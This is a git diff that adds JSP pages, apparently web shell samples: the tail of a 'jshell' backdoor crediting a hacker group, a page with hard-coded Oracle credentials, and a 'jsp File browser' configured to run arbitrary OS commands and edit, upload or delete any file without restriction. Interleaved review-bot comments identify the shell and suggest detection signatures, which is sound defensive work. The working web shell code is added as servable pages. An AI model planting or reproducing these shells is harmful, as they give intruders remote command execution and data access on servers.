+ if (DBInit(dbType, dbServer, dbPort, dbUsername, dbPassword, dbName)) {
+ if (DBConnect(dbUsername, dbPassword)) {
+ if (request.getParameter("sql") != null) {
+ sql = request.getParameter("sql").trim();
+ if (! sql.equals("")) {
+ dbResult = DBExecute(sql);
+ }
+ }
+
+ result = "\n";
+ result += "sql语句" + sql + " \n";
+
+ DBRelease();
+ } else {
+ result = "数据库连接失败 ";
+ }
+ } else {
+ result = "数据库连接驱动没有找到 ";
+ }
+ }
+ }
+%>
+
+
+
+
+
+ <%=dbResult%>
+
+
+
+<%
+
+////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
+ } else if (action.equals("config")) {
+ String cfAction = "";
+ int i;
+
+ if (request.getParameter("cfAction") == null) {
+
+ cfAction = "main";
+ } else {
+ cfAction = request.getParameter("cfAction").trim();
+ if (cfAction.equals(""))
+ cfAction = "main";
+ }
+
+ if (cfAction.equals("main")) {
+// start of config form
+//==========================================================================================
+%>
+
+
+<%
+ } else if (cfAction.equals("save")) {
+ if (request.getParameter("password") == null ||
+ request.getParameter("encode") == null ||
+ request.getParameter("sessionTime") == null ||
+ request.getParameterValues("textFileTypes") == null) {
+ response.sendRedirect(request.getRequestURI());
+ }
+
+ String result = "";
+
+ String newPassword = request.getParameter("password").trim();
+ String newEncodeType = request.getParameter("encode").trim();
+ String newSessionTime = request.getParameter("sessionTime").trim();
+ String[] newTextFileTypes = request.getParameterValues("textFileTypes");
+ String jshellPath = request.getRealPath(request.getServletPath());
+
+ try {
+ JshellConfig jconfig = new JshellConfig(jshellPath);
+ jconfig.setPassword(newPassword);
+ jconfig.setEncodeType(newEncodeType);
+ jconfig.setSessionTime(newSessionTime);
+ jconfig.setTextFileTypes(newTextFileTypes);
+ jconfig.save();
+ result += "设置保存成功,正在返回,请稍候……";
+ result += " ";
+ } catch (JshellConfigException e) {
+ result = "" + e.getMessage() + " ";
+ }
+
+%>
+
+
+ <%=result == "" ? " " : result%>
+
+
+<%
+ }
+//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
+//==========================================================================================
+// end of config form
+ } else if (action.equals("about")) {
+// start of about
+//==========================================================================================
+%>
+
+
+ 关于 jshell ver 0.1
+
+
+ 增加了显示alxea排名的功能,这对于入侵中也比较方便些,版权还是归作者的.
+
+
+ hack520 by hack520 and welcome to 华夏黑客同盟
+
+
+<%
+//==========================================================================================
+ }
+}
+%>
+
+
\ No newline at end of file
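Review bot: `jsp/520.jsp` is added as a servable `.jsp`, yet its own title and about text identify it as a JFolder / jshell remote administration page, so any servlet container that serves this directory will compile and run it. `exeCmd` passes the `command` request parameter straight to `Runtime.exec`, the `filesystem` actions read, write, delete and upload with no path restriction visible in the file, and `DBExecute` runs the `sql` parameter unmodified; the only gate is `validate`, a plain `equals` against the hard-coded `_password` field. If this repository is a sample collection, store the file under a non-servable name and open it with a marker such as `<%-- SAMPLE: JFolder/jshell web shell, kept for detection work; not part of any deployable webapp --%>`. For detection content, two traits on the page make stable match targets: `Runtime.getRuntime()` followed by `exec` on a request parameter, and `JshellConfig.save()` rewriting the page's own source at `request.getRealPath(request.getServletPath())`.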
diff --git a/jsp/action.jsp b/jsp/action.jsp
new file mode 100644
index 0000000..f4c11ae
--- /dev/null
+++ b/jsp/action.jsp
@@ -0,0 +1,50 @@
+<%@ page contentType="text/html;charset=gb2312"%>
+<%@ page import="java.lang.*"%>
+<%@ page import="java.sql.*"%>
+<%@ page import="java.util.*"%>
+<%@ page import="java.io.*"%>
+
+
+
+xxx
+
+
+
+
+
+
+1 2 3 4 5 6 7 8 9 10
+
+<%Class.forName("oracle.jdbc.driver.OracleDriver").newInstance();
+String url="jdbc:oracle:thin:@localhost:1521:orcl";
+String user="oracle_admin";
+String password="oracle_password";
+Connection conn= DriverManager.getConnection(url,user,password);
+Statement stmt=conn.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE,ResultSet.CONCUR_UPDATABLE);
+String sql="SELECT 1,2,3,4,5,6,7,8,9,10 from user_info";
+ResultSet rs=stmt.executeQuery(sql);
+while(rs.next()) {%>
+
+<%=rs.getString(1)%>
+<%=rs.getString(2)%>
+<%=rs.getString(3)%>
+<%=rs.getString(4)%>
+<%=rs.getString(5)%>
+<%=rs.getString(6)%>
+<%=rs.getString(7)%>
+<%=rs.getString(8)%>
+<%=rs.getString(9)%>
+<%=rs.getString(10)%>
+
+<%}%>
+<%rs.close();
+stmt.close();
+conn.close();
+%>
+
+
\ No newline at end of file
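Review bot: The database account name and password are string literals in the scriptlet (`String user=...` and `String password=...`), so anyone who can read the repository or the deployed JSP source obtains them. Take the connection from a container-managed pool instead, e.g. `Connection conn = ((javax.sql.DataSource) new javax.naming.InitialContext().lookup("java:comp/env/jdbc/RESOURCE_NAME_PLACEHOLDER")).getConnection();`, and rotate the credentials that were committed. The `rs.close(); stmt.close(); conn.close();` calls in the last scriptlet run only when nothing throws, so a failed query leaks the connection; they belong in a `finally` block. Each `<%=rs.getString(n)%>` is written into the HTML response without escaping, and no access check is visible in this file before the query runs, so output encoding and an authorization gate should be added or confirmed to exist in front of this page.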
diff --git a/jsp/pyth.jsp b/jsp/pyth.jsp
new file mode 100644
index 0000000..2bac9d1
--- /dev/null
+++ b/jsp/pyth.jsp
@@ -0,0 +1,1934 @@
+<%--
+ jsp File browser 1.2
+ Copyright (C) 2003-2006 Boris von Loesch
+ This program is free software; you can redistribute it and/or modify it under
+ the terms of the GNU General Public License as published by the
+ Free Software Foundation; either version 2 of the License, or (at your option)
+ any later version.
+ This program is distributed in the hope that it will be useful, but
+ WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
+ FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
+ You should have received a copy of the GNU General Public License along with
+ this program; if not, write to the
+ Free Software Foundation, Inc.,
+ 59 Temple Place, Suite 330,
+ Boston, MA 02111-1307 USA
+ - Description: jsp File browser v1.2 -- This JSP program allows remote web-based
+ file access and manipulation. You can copy, create, move and delete files.
+ Text files can be edited and groups of files and folders can be downloaded
+ as a single zip file that's created on the fly.
+ - Credits: Taylor Bastien, David Levine, David Cowan, Lieven Govaerts
+--%>
+<%@page import="java.util.*,
+ java.net.*,
+ java.text.*,
+ java.util.zip.*,
+ java.io.*"
+%>
+<%!
+ //FEATURES
+ private static final boolean NATIVE_COMMANDS = true;
+ /**
+ *If true, all operations (besides upload and native commands)
+ *which change something on the file system are permitted
+ */
+ private static final boolean READ_ONLY = false;
+ //If true, uploads are allowed even if READ_ONLY = true
+ private static final boolean ALLOW_UPLOAD = true;
+
+ //Allow browsing and file manipulation only in certain directories
+ private static final boolean RESTRICT_BROWSING = false;
+ //If true, the user is allowed to browse only in RESTRICT_PATH,
+ //if false, the user is allowed to browse all directories besides RESTRICT_PATH
+ private static final boolean RESTRICT_WHITELIST = false;
+ //Paths, sperated by semicolon
+ //private static final String RESTRICT_PATH = "C:\\CODE;E:\\"; //Win32: Case important!!
+ private static final String RESTRICT_PATH = "/etc;/var";
+
+ //The refresh time in seconds of the upload monitor window
+ private static final int UPLOAD_MONITOR_REFRESH = 2;
+ //The number of colums for the edit field
+ private static final int EDITFIELD_COLS = 85;
+ //The number of rows for the edit field
+ private static final int EDITFIELD_ROWS = 30;
+ //Open a new window to view a file
+ private static final boolean USE_POPUP = true;
+ /**
+ * If USE_DIR_PREVIEW = true, then for every directory a tooltip will be
+ * created (hold the mouse over the link) with the first DIR_PREVIEW_NUMBER entries.
+ * This can yield to performance issues. Turn it off, if the directory loads to slow.
+ */
+ private static final boolean USE_DIR_PREVIEW = false;
+ private static final int DIR_PREVIEW_NUMBER = 10;
+ /**
+ * The name of an optional CSS Stylesheet file
+ */
+ private static final String CSS_NAME = "Browser.css";
+ /**
+ * The compression level for zip file creation (0-9)
+ * 0 = No compression
+ * 1 = Standard compression (Very fast)
+ * ...
+ * 9 = Best compression (Very slow)
+ */
+ private static final int COMPRESSION_LEVEL = 1;
+ /**
+ * The FORBIDDEN_DRIVES are not displayed on the list. This can be usefull, if the
+ * server runs on a windows platform, to avoid a message box, if you try to access
+ * an empty removable drive (See KNOWN BUGS in Readme.txt).
+ */
+ private static final String[] FORBIDDEN_DRIVES = {"a:\\"};
+
+ /**
+ * Command of the shell interpreter and the parameter to run a programm
+ */
+ private static final String[] COMMAND_INTERPRETER = {"cmd", "/C"}; // Dos,Windows
+ //private static final String[] COMMAND_INTERPRETER = {"/bin/sh","-c"}; // Unix
+
+ /**
+ * Max time in ms a process is allowed to run, before it will be terminated
+ */
+ private static final long MAX_PROCESS_RUNNING_TIME = 30 * 1000; //30 seconds
+
+ //Button names
+ private static final String SAVE_AS_ZIP = "Download selected files as (z)ip";
+ private static final String RENAME_FILE = "(R)ename File";
+ private static final String DELETE_FILES = "(Del)ete selected files";
+ private static final String CREATE_DIR = "Create (D)ir";
+ private static final String CREATE_FILE = "(C)reate File";
+ private static final String MOVE_FILES = "(M)ove Files";
+ private static final String COPY_FILES = "Cop(y) Files";
+ private static final String LAUNCH_COMMAND = "(L)aunch external program";
+ private static final String UPLOAD_FILES = "Upload";
+
+ //Normally you should not change anything after this line
+ //----------------------------------------------------------------------------------
+ //Change this to locate the tempfile directory for upload (not longer needed)
+ private static String tempdir = ".";
+ private static String VERSION_NR = "1.2";
+ private static DateFormat dateFormat = DateFormat.getDateTimeInstance();
+
+ public class UplInfo {
+
+ public long totalSize;
+ public long currSize;
+ public long starttime;
+ public boolean aborted;
+
+ public UplInfo() {
+ totalSize = 0l;
+ currSize = 0l;
+ starttime = System.currentTimeMillis();
+ aborted = false;
+ }
+
+ public UplInfo(int size) {
+ totalSize = size;
+ currSize = 0;
+ starttime = System.currentTimeMillis();
+ aborted = false;
+ }
+
+ public String getUprate() {
+ long time = System.currentTimeMillis() - starttime;
+ if (time != 0) {
+ long uprate = currSize * 1000 / time;
+ return convertFileSize(uprate) + "/s";
+ }
+ else return "n/a";
+ }
+
+ public int getPercent() {
+ if (totalSize == 0) return 0;
+ else return (int) (currSize * 100 / totalSize);
+ }
+
+ public String getTimeElapsed() {
+ long time = (System.currentTimeMillis() - starttime) / 1000l;
+ if (time - 60l >= 0){
+ if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m";
+ else return time / 60 + ":0" + (time % 60) + "m";
+ }
+ else return time<10 ? "0" + time + "s": time + "s";
+ }
+
+ public String getTimeEstimated() {
+ if (currSize == 0) return "n/a";
+ long time = System.currentTimeMillis() - starttime;
+ time = totalSize * time / currSize;
+ time /= 1000l;
+ if (time - 60l >= 0){
+ if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m";
+ else return time / 60 + ":0" + (time % 60) + "m";
+ }
+ else return time<10 ? "0" + time + "s": time + "s";
+ }
+
+ }
+
+ public class FileInfo {
+
+ public String name = null, clientFileName = null, fileContentType = null;
+ private byte[] fileContents = null;
+ public File file = null;
+ public StringBuffer sb = new StringBuffer(100);
+
+ public void setFileContents(byte[] aByteArray) {
+ fileContents = new byte[aByteArray.length];
+ System.arraycopy(aByteArray, 0, fileContents, 0, aByteArray.length);
+ }
+ }
+
+ public static class UploadMonitor {
+
+ static Hashtable uploadTable = new Hashtable();
+
+ static void set(String fName, UplInfo info) {
+ uploadTable.put(fName, info);
+ }
+
+ static void remove(String fName) {
+ uploadTable.remove(fName);
+ }
+
+ static UplInfo getInfo(String fName) {
+ UplInfo info = (UplInfo) uploadTable.get(fName);
+ return info;
+ }
+ }
+
+ // A Class with methods used to process a ServletInputStream
+ public class HttpMultiPartParser {
+
+ //private final String lineSeparator = System.getProperty("line.separator", "\n");
+ private final int ONE_MB = 1024 * 1;
+
+ public Hashtable processData(ServletInputStream is, String boundary, String saveInDir,
+ int clength) throws IllegalArgumentException, IOException {
+ if (is == null) throw new IllegalArgumentException("InputStream");
+ if (boundary == null || boundary.trim().length() < 1) throw new IllegalArgumentException(
+ "\"" + boundary + "\" is an illegal boundary indicator");
+ boundary = "--" + boundary;
+ StringTokenizer stLine = null, stFields = null;
+ FileInfo fileInfo = null;
+ Hashtable dataTable = new Hashtable(5);
+ String line = null, field = null, paramName = null;
+ boolean saveFiles = (saveInDir != null && saveInDir.trim().length() > 0);
+ boolean isFile = false;
+ if (saveFiles) { // Create the required directory (including parent dirs)
+ File f = new File(saveInDir);
+ f.mkdirs();
+ }
+ line = getLine(is);
+ if (line == null || !line.startsWith(boundary)) throw new IOException(
+ "Boundary not found; boundary = " + boundary + ", line = " + line);
+ while (line != null) {
+ if (line == null || !line.startsWith(boundary)) return dataTable;
+ line = getLine(is);
+ if (line == null) return dataTable;
+ stLine = new StringTokenizer(line, ";\r\n");
+ if (stLine.countTokens() < 2) throw new IllegalArgumentException(
+ "Bad data in second line");
+ line = stLine.nextToken().toLowerCase();
+ if (line.indexOf("form-data") < 0) throw new IllegalArgumentException(
+ "Bad data in second line");
+ stFields = new StringTokenizer(stLine.nextToken(), "=\"");
+ if (stFields.countTokens() < 2) throw new IllegalArgumentException(
+ "Bad data in second line");
+ fileInfo = new FileInfo();
+ stFields.nextToken();
+ paramName = stFields.nextToken();
+ isFile = false;
+ if (stLine.hasMoreTokens()) {
+ field = stLine.nextToken();
+ stFields = new StringTokenizer(field, "=\"");
+ if (stFields.countTokens() > 1) {
+ if (stFields.nextToken().trim().equalsIgnoreCase("filename")) {
+ fileInfo.name = paramName;
+ String value = stFields.nextToken();
+ if (value != null && value.trim().length() > 0) {
+ fileInfo.clientFileName = value;
+ isFile = true;
+ }
+ else {
+ line = getLine(is); // Skip "Content-Type:" line
+ line = getLine(is); // Skip blank line
+ line = getLine(is); // Skip blank line
+ line = getLine(is); // Position to boundary line
+ continue;
+ }
+ }
+ }
+ else if (field.toLowerCase().indexOf("filename") >= 0) {
+ line = getLine(is); // Skip "Content-Type:" line
+ line = getLine(is); // Skip blank line
+ line = getLine(is); // Skip blank line
+ line = getLine(is); // Position to boundary line
+ continue;
+ }
+ }
+ boolean skipBlankLine = true;
+ if (isFile) {
+ line = getLine(is);
+ if (line == null) return dataTable;
+ if (line.trim().length() < 1) skipBlankLine = false;
+ else {
+ stLine = new StringTokenizer(line, ": ");
+ if (stLine.countTokens() < 2) throw new IllegalArgumentException(
+ "Bad data in third line");
+ stLine.nextToken(); // Content-Type
+ fileInfo.fileContentType = stLine.nextToken();
+ }
+ }
+ if (skipBlankLine) {
+ line = getLine(is);
+ if (line == null) return dataTable;
+ }
+ if (!isFile) {
+ line = getLine(is);
+ if (line == null) return dataTable;
+ dataTable.put(paramName, line);
+ // If parameter is dir, change saveInDir to dir
+ if (paramName.equals("dir")) saveInDir = line;
+ line = getLine(is);
+ continue;
+ }
+ try {
+ UplInfo uplInfo = new UplInfo(clength);
+ UploadMonitor.set(fileInfo.clientFileName, uplInfo);
+ OutputStream os = null;
+ String path = null;
+ if (saveFiles) os = new FileOutputStream(path = getFileName(saveInDir,
+ fileInfo.clientFileName));
+ else os = new ByteArrayOutputStream(ONE_MB);
+ boolean readingContent = true;
+ byte previousLine[] = new byte[2 * ONE_MB];
+ byte temp[] = null;
+ byte currentLine[] = new byte[2 * ONE_MB];
+ int read, read3;
+ if ((read = is.readLine(previousLine, 0, previousLine.length)) == -1) {
+ line = null;
+ break;
+ }
+ while (readingContent) {
+ if ((read3 = is.readLine(currentLine, 0, currentLine.length)) == -1) {
+ line = null;
+ uplInfo.aborted = true;
+ break;
+ }
+ if (compareBoundary(boundary, currentLine)) {
+ os.write(previousLine, 0, read - 2);
+ line = new String(currentLine, 0, read3);
+ break;
+ }
+ else {
+ os.write(previousLine, 0, read);
+ uplInfo.currSize += read;
+ temp = currentLine;
+ currentLine = previousLine;
+ previousLine = temp;
+ read = read3;
+ }//end else
+ }//end while
+ os.flush();
+ os.close();
+ if (!saveFiles) {
+ ByteArrayOutputStream baos = (ByteArrayOutputStream) os;
+ fileInfo.setFileContents(baos.toByteArray());
+ }
+ else fileInfo.file = new File(path);
+ dataTable.put(paramName, fileInfo);
+ uplInfo.currSize = uplInfo.totalSize;
+ }//end try
+ catch (IOException e) {
+ throw e;
+ }
+ }
+ return dataTable;
+ }
+
+ /**
+ * Compares boundary string to byte array
+ */
+ private boolean compareBoundary(String boundary, byte ba[]) {
+ if (boundary == null || ba == null) return false;
+ for (int i = 0; i < boundary.length(); i++)
+ if ((byte) boundary.charAt(i) != ba[i]) return false;
+ return true;
+ }
+
+ /** Convenience method to read HTTP header lines */
+ private synchronized String getLine(ServletInputStream sis) throws IOException {
+ byte b[] = new byte[1024];
+ int read = sis.readLine(b, 0, b.length), index;
+ String line = null;
+ if (read != -1) {
+ line = new String(b, 0, read);
+ if ((index = line.indexOf('\n')) >= 0) line = line.substring(0, index - 1);
+ }
+ return line;
+ }
+
+ public String getFileName(String dir, String fileName) throws IllegalArgumentException {
+ String path = null;
+ if (dir == null || fileName == null) throw new IllegalArgumentException(
+ "dir or fileName is null");
+ int index = fileName.lastIndexOf('/');
+ String name = null;
+ if (index >= 0) name = fileName.substring(index + 1);
+ else name = fileName;
+ index = name.lastIndexOf('\\');
+ if (index >= 0) fileName = name.substring(index + 1);
+ path = dir + File.separator + fileName;
+ if (File.separatorChar == '/') return path.replace('\\', File.separatorChar);
+ else return path.replace('/', File.separatorChar);
+ }
+ } //End of class HttpMultiPartParser
+
+ /**
+ * This class is a comparator to sort the filenames and dirs
+ */
+ class FileComp implements Comparator {
+
+ int mode;
+ int sign;
+
+ FileComp() {
+ this.mode = 1;
+ this.sign = 1;
+ }
+
+ /**
+ * @param mode sort by 1=Filename, 2=Size, 3=Date, 4=Type
+ * The default sorting method is by Name
+ * Negative mode means descending sort
+ */
+ FileComp(int mode) {
+ if (mode < 0) {
+ this.mode = -mode;
+ sign = -1;
+ }
+ else {
+ this.mode = mode;
+ this.sign = 1;
+ }
+ }
+
+ public int compare(Object o1, Object o2) {
+ File f1 = (File) o1;
+ File f2 = (File) o2;
+ if (f1.isDirectory()) {
+ if (f2.isDirectory()) {
+ switch (mode) {
+ //Filename or Type
+ case 1:
+ case 4:
+ return sign
+ * f1.getAbsolutePath().toUpperCase().compareTo(
+ f2.getAbsolutePath().toUpperCase());
+ //Filesize
+ case 2:
+ return sign * (new Long(f1.length()).compareTo(new Long(f2.length())));
+ //Date
+ case 3:
+ return sign
+ * (new Long(f1.lastModified())
+ .compareTo(new Long(f2.lastModified())));
+ default:
+ return 1;
+ }
+ }
+ else return -1;
+ }
+ else if (f2.isDirectory()) return 1;
+ else {
+ switch (mode) {
+ case 1:
+ return sign
+ * f1.getAbsolutePath().toUpperCase().compareTo(
+ f2.getAbsolutePath().toUpperCase());
+ case 2:
+ return sign * (new Long(f1.length()).compareTo(new Long(f2.length())));
+ case 3:
+ return sign
+ * (new Long(f1.lastModified()).compareTo(new Long(f2.lastModified())));
+ case 4: { // Sort by extension
+ int tempIndexf1 = f1.getAbsolutePath().lastIndexOf('.');
+ int tempIndexf2 = f2.getAbsolutePath().lastIndexOf('.');
+ if ((tempIndexf1 == -1) && (tempIndexf2 == -1)) { // Neither have an extension
+ return sign
+ * f1.getAbsolutePath().toUpperCase().compareTo(
+ f2.getAbsolutePath().toUpperCase());
+ }
+ // f1 has no extension
+ else if (tempIndexf1 == -1) return -sign;
+ // f2 has no extension
+ else if (tempIndexf2 == -1) return sign;
+ // Both have an extension
+ else {
+ String tempEndf1 = f1.getAbsolutePath().toUpperCase()
+ .substring(tempIndexf1);
+ String tempEndf2 = f2.getAbsolutePath().toUpperCase()
+ .substring(tempIndexf2);
+ return sign * tempEndf1.compareTo(tempEndf2);
+ }
+ }
+ default:
+ return 1;
+ }
+ }
+ }
+ }
+
+ /**
+ * Wrapperclass to wrap an OutputStream around a Writer
+ */
+ class Writer2Stream extends OutputStream {
+
+ Writer out;
+
+ Writer2Stream(Writer w) {
+ super();
+ out = w;
+ }
+
+ public void write(int i) throws IOException {
+ out.write(i);
+ }
+
+ public void write(byte[] b) throws IOException {
+ for (int i = 0; i < b.length; i++) {
+ int n = b[i];
+ //Convert byte to ubyte
+ n = ((n >>> 4) & 0xF) * 16 + (n & 0xF);
+ out.write(n);
+ }
+ }
+
+ public void write(byte[] b, int off, int len) throws IOException {
+ for (int i = off; i < off + len; i++) {
+ int n = b[i];
+ n = ((n >>> 4) & 0xF) * 16 + (n & 0xF);
+ out.write(n);
+ }
+ }
+ } //End of class Writer2Stream
+
+ static Vector expandFileList(String[] files, boolean inclDirs) {
+ Vector v = new Vector();
+ if (files == null) return v;
+ for (int i = 0; i < files.length; i++)
+ v.add(new File(URLDecoder.decode(files[i])));
+ for (int i = 0; i < v.size(); i++) {
+ File f = (File) v.get(i);
+ if (f.isDirectory()) {
+ File[] fs = f.listFiles();
+ for (int n = 0; n < fs.length; n++)
+ v.add(fs[n]);
+ if (!inclDirs) {
+ v.remove(i);
+ i--;
+ }
+ }
+ }
+ return v;
+ }
+
+ /**
+ * Method to build an absolute path
+ * @param dir the root dir
+ * @param name the name of the new directory
+ * @return if name is an absolute directory, returns name, else returns dir+name
+ */
+ static String getDir(String dir, String name) {
+ if (!dir.endsWith(File.separator)) dir = dir + File.separator;
+ File mv = new File(name);
+ String new_dir = null;
+ if (!mv.isAbsolute()) {
+ new_dir = dir + name;
+ }
+ else new_dir = name;
+ return new_dir;
+ }
+
+ /**
+ * This Method converts a byte size in a kbytes or Mbytes size, depending on the size
+ * @param size The size in bytes
+ * @return String with size and unit
+ */
+ static String convertFileSize(long size) {
+ int divisor = 1;
+ String unit = "bytes";
+ if (size >= 1024 * 1024) {
+ divisor = 1024 * 1024;
+ unit = "MB";
+ }
+ else if (size >= 1024) {
+ divisor = 1024;
+ unit = "KB";
+ }
+ if (divisor == 1) return size / divisor + " " + unit;
+ String aftercomma = "" + 100 * (size % divisor) / divisor;
+ if (aftercomma.length() == 1) aftercomma = "0" + aftercomma;
+ return size / divisor + "." + aftercomma + " " + unit;
+ }
+
+ /**
+ * Copies all data from in to out
+ * @param in the input stream
+ * @param out the output stream
+ * @param buffer copy buffer
+ */
+ static void copyStreams(InputStream in, OutputStream out, byte[] buffer) throws IOException {
+ copyStreamsWithoutClose(in, out, buffer);
+ in.close();
+ out.close();
+ }
+
+ /**
+ * Copies all data from in to out
+ * @param in the input stream
+ * @param out the output stream
+ * @param buffer copy buffer
+ */
+ static void copyStreamsWithoutClose(InputStream in, OutputStream out, byte[] buffer)
+ throws IOException {
+ int b;
+ while ((b = in.read(buffer)) != -1)
+ out.write(buffer, 0, b);
+ }
+
+ /**
+ * Returns the Mime Type of the file, depending on the extension of the filename
+ */
+ static String getMimeType(String fName) {
+ fName = fName.toLowerCase();
+ if (fName.endsWith(".jpg") || fName.endsWith(".jpeg") || fName.endsWith(".jpe")) return "image/jpeg";
+ else if (fName.endsWith(".gif")) return "image/gif";
+ else if (fName.endsWith(".pdf")) return "application/pdf";
+ else if (fName.endsWith(".htm") || fName.endsWith(".html") || fName.endsWith(".shtml")) return "text/html";
+ else if (fName.endsWith(".avi")) return "video/x-msvideo";
+ else if (fName.endsWith(".mov") || fName.endsWith(".qt")) return "video/quicktime";
+ else if (fName.endsWith(".mpg") || fName.endsWith(".mpeg") || fName.endsWith(".mpe")) return "video/mpeg";
+ else if (fName.endsWith(".zip")) return "application/zip";
+ else if (fName.endsWith(".tiff") || fName.endsWith(".tif")) return "image/tiff";
+ else if (fName.endsWith(".rtf")) return "application/rtf";
+ else if (fName.endsWith(".mid") || fName.endsWith(".midi")) return "audio/x-midi";
+ else if (fName.endsWith(".xl") || fName.endsWith(".xls") || fName.endsWith(".xlv")
+ || fName.endsWith(".xla") || fName.endsWith(".xlb") || fName.endsWith(".xlt")
+ || fName.endsWith(".xlm") || fName.endsWith(".xlk")) return "application/excel";
+ else if (fName.endsWith(".doc") || fName.endsWith(".dot")) return "application/msword";
+ else if (fName.endsWith(".png")) return "image/png";
+ else if (fName.endsWith(".xml")) return "text/xml";
+ else if (fName.endsWith(".svg")) return "image/svg+xml";
+ else if (fName.endsWith(".mp3")) return "audio/mp3";
+ else if (fName.endsWith(".ogg")) return "audio/ogg";
+ else return "text/plain";
+ }
+
+ /**
+ * Converts some important chars (int) to the corresponding html string
+ */
+ static String conv2Html(int i) {
+ if (i == '&') return "&";
+ else if (i == '<') return "<";
+ else if (i == '>') return ">";
+ else if (i == '"') return """;
+ else return "" + (char) i;
+ }
+
+ /**
+ * Converts a normal string to a html conform string
+ */
+ static String conv2Html(String st) {
+ StringBuffer buf = new StringBuffer();
+ for (int i = 0; i < st.length(); i++) {
+ buf.append(conv2Html(st.charAt(i)));
+ }
+ return buf.toString();
+ }
+
+ /**
+ * Starts a native process on the server
+ * @param command the command to start the process
+ * @param dir the dir in which the process starts
+ */
+ static String startProcess(String command, String dir) throws IOException {
+ StringBuffer ret = new StringBuffer();
+ String[] comm = new String[3];
+ comm[0] = COMMAND_INTERPRETER[0];
+ comm[1] = COMMAND_INTERPRETER[1];
+ comm[2] = command;
+ long start = System.currentTimeMillis();
+ try {
+ //Start process
+ Process ls_proc = Runtime.getRuntime().exec(comm, null, new File(dir));
+ //Get input and error streams
+ BufferedInputStream ls_in = new BufferedInputStream(ls_proc.getInputStream());
+ BufferedInputStream ls_err = new BufferedInputStream(ls_proc.getErrorStream());
+ boolean end = false;
+ while (!end) {
+ int c = 0;
+ while ((ls_err.available() > 0) && (++c <= 1000)) {
+ ret.append(conv2Html(ls_err.read()));
+ }
+ c = 0;
+ while ((ls_in.available() > 0) && (++c <= 1000)) {
+ ret.append(conv2Html(ls_in.read()));
+ }
+ try {
+ ls_proc.exitValue();
+ //if the process has not finished, an exception is thrown
+ //else
+ while (ls_err.available() > 0)
+ ret.append(conv2Html(ls_err.read()));
+ while (ls_in.available() > 0)
+ ret.append(conv2Html(ls_in.read()));
+ end = true;
+ }
+ catch (IllegalThreadStateException ex) {
+ //Process is running
+ }
+ //The process is not allowed to run longer than given time.
+ if (System.currentTimeMillis() - start > MAX_PROCESS_RUNNING_TIME) {
+ ls_proc.destroy();
+ end = true;
+ ret.append("!!!! Process has timed out, destroyed !!!!!");
+ }
+ try {
+ Thread.sleep(50);
+ }
+ catch (InterruptedException ie) {}
+ }
+ }
+ catch (IOException e) {
+ ret.append("Error: " + e);
+ }
+ return ret.toString();
+ }
+
+ /**
+ * Converts a dir string to a linked dir string
+ * @param dir the directory string (e.g. /usr/local/httpd)
+ * @param browserLink web-path to Browser.jsp
+ */
+ static String dir2linkdir(String dir, String browserLink, int sortMode) {
+ File f = new File(dir);
+ StringBuffer buf = new StringBuffer();
+ while (f.getParentFile() != null) {
+ if (f.canRead()) {
+ String encPath = URLEncoder.encode(f.getAbsolutePath());
+ buf.insert(0, "" + conv2Html(f.getName()) + File.separator + " ");
+ }
+ else buf.insert(0, conv2Html(f.getName()) + File.separator);
+ f = f.getParentFile();
+ }
+ if (f.canRead()) {
+ String encPath = URLEncoder.encode(f.getAbsolutePath());
+ buf.insert(0, "" + conv2Html(f.getAbsolutePath()) + " ");
+ }
+ else buf.insert(0, f.getAbsolutePath());
+ return buf.toString();
+ }
+
+ /**
+ * Returns true if the given filename tends towards a packed file
+ */
+ static boolean isPacked(String name, boolean gz) {
+ return (name.toLowerCase().endsWith(".zip") || name.toLowerCase().endsWith(".jar")
+ || (gz && name.toLowerCase().endsWith(".gz")) || name.toLowerCase()
+ .endsWith(".war"));
+ }
+
+ /**
+ * If RESTRICT_BROWSING = true this method checks, whether the path is allowed or not
+ */
+ static boolean isAllowed(File path, boolean write) throws IOException{
+ if (READ_ONLY && write) return false;
+ if (RESTRICT_BROWSING) {
+ StringTokenizer stk = new StringTokenizer(RESTRICT_PATH, ";");
+ while (stk.hasMoreTokens()){
+ if (path!=null && path.getCanonicalPath().startsWith(stk.nextToken()))
+ return RESTRICT_WHITELIST;
+ }
+ return !RESTRICT_WHITELIST;
+ }
+ else return true;
+ }
+
+ //---------------------------------------------------------------------------------------------------------------
+
+ %>
+<%
+ //Get the current browsing directory
+ request.setAttribute("dir", request.getParameter("dir"));
+ // The browser_name variable is used to keep track of the URI
+ // of the jsp file itself. It is used in all link-backs.
+ final String browser_name = request.getRequestURI();
+ final String FOL_IMG = "";
+ boolean nohtml = false;
+ boolean dir_view = true;
+ //Get Javascript
+ if (request.getParameter("Javascript") != null) {
+ dir_view = false;
+ nohtml = true;
+ //Tell the browser that it should cache the javascript
+ response.setHeader("Cache-Control", "public");
+ Date now = new Date();
+ SimpleDateFormat sdf = new SimpleDateFormat("EEE, d MMM yyyy HH:mm:ss z", Locale.US);
+ response.setHeader("Expires", sdf.format(new Date(now.getTime() + 1000 * 60 * 60 * 24*2)));
+ response.setHeader("Content-Type", "text/javascript");
+ %>
+ <%// This section contains the Javascript used for interface elements %>
+ var check = false;
+ <%// Disables the checkbox feature %>
+ function dis(){check = true;}
+
+ var DOM = 0, MS = 0, OP = 0, b = 0;
+ <%// Determine the browser type %>
+ function CheckBrowser(){
+ if (b == 0){
+ if (window.opera) OP = 1;
+ // Moz or Netscape
+ if(document.getElementById) DOM = 1;
+ // Micro$oft
+ if(document.all && !OP) MS = 1;
+ b = 1;
+ }
+ }
+ <%// Allows the whole row to be selected %>
+ function selrow (element, i){
+ var erst;
+ CheckBrowser();
+ if ((OP==1)||(MS==1)) erst = element.firstChild.firstChild;
+ else if (DOM==1) erst = element.firstChild.nextSibling.firstChild;
+ <%// MouseIn %>
+ if (i==0){
+ if (erst.checked == true) element.className='mousechecked';
+ else element.className='mousein';
+ }
+ <%// MouseOut %>
+ else if (i==1){
+ if (erst.checked == true) element.className='checked';
+ else element.className='mouseout';
+ }
+ <% // MouseClick %>
+ else if ((i==2)&&(!check)){
+ if (erst.checked==true) element.className='mousein';
+ else element.className='mousechecked';
+ erst.click();
+ }
+ else check=false;
+ }
